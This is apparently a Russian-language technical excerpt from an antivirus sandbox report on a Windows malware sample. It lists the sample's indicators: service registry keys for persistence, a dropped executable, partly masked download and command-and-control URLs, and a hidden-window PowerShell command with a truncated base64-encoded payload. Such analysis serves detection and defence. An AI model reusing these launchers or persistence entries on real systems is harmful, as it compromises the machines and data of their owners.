Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\targetsquery] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\targetsquery] 'ImagePath' = '"<SYSTEM32>\targetsquery.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGsAZwB4AHAAZwBpAHcAPQAnAEcAZgBiAHoAcwB3AGsAaABsAHIAaABxACcAOwAkAEUAbwBhAGMAZQBrAGUAawBvAHoAagAgAD0AIAAnADQANQA1ACcAOwAkAEkAbwBtAHEAYQBzAGkAdAA9ACcAVwBpAHMAbAB4AGwAcwBxAHQAdQB...
- %HOMEPATH%\455.exe
- %HOMEPATH%\455.exe в <SYSTEM32>\targetsquery.exe
- http://oc###s-news.com/wp-admin/Pa00/
- http://68.##4.15.223/qGlobftQafLZpy
- http://19#.##1.143.52:8080/ncN4Bwf via 19#.#41.143.52
- http://15#.##.241.220:8080/ye7TZENO8 via 15#.#5.241.220
- http://45.##.95.107:443/6KIOYvwpPP1veX via 45.##.95.107
- DNS ASK oc###s-news.com
- '%HOMEPATH%\455.exe'
- '<SYSTEM32>\targetsquery.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGsAZwB4AHAAZwBpAHcAPQAnAEcAZgBiAHoAcwB3AGsAaABsAHIAaABxACcAOwAkAEUAbwBhAGMAZQBrAGUAawBvAHoAagAgAD0AIAAnADQANQA1ACcAOwAkAEkAbwBtAHEAYQBzAGkAdAA9ACcAVwBpAHMAbAB4AGwAcwBxAHQAdQB...' (со скрытым окном)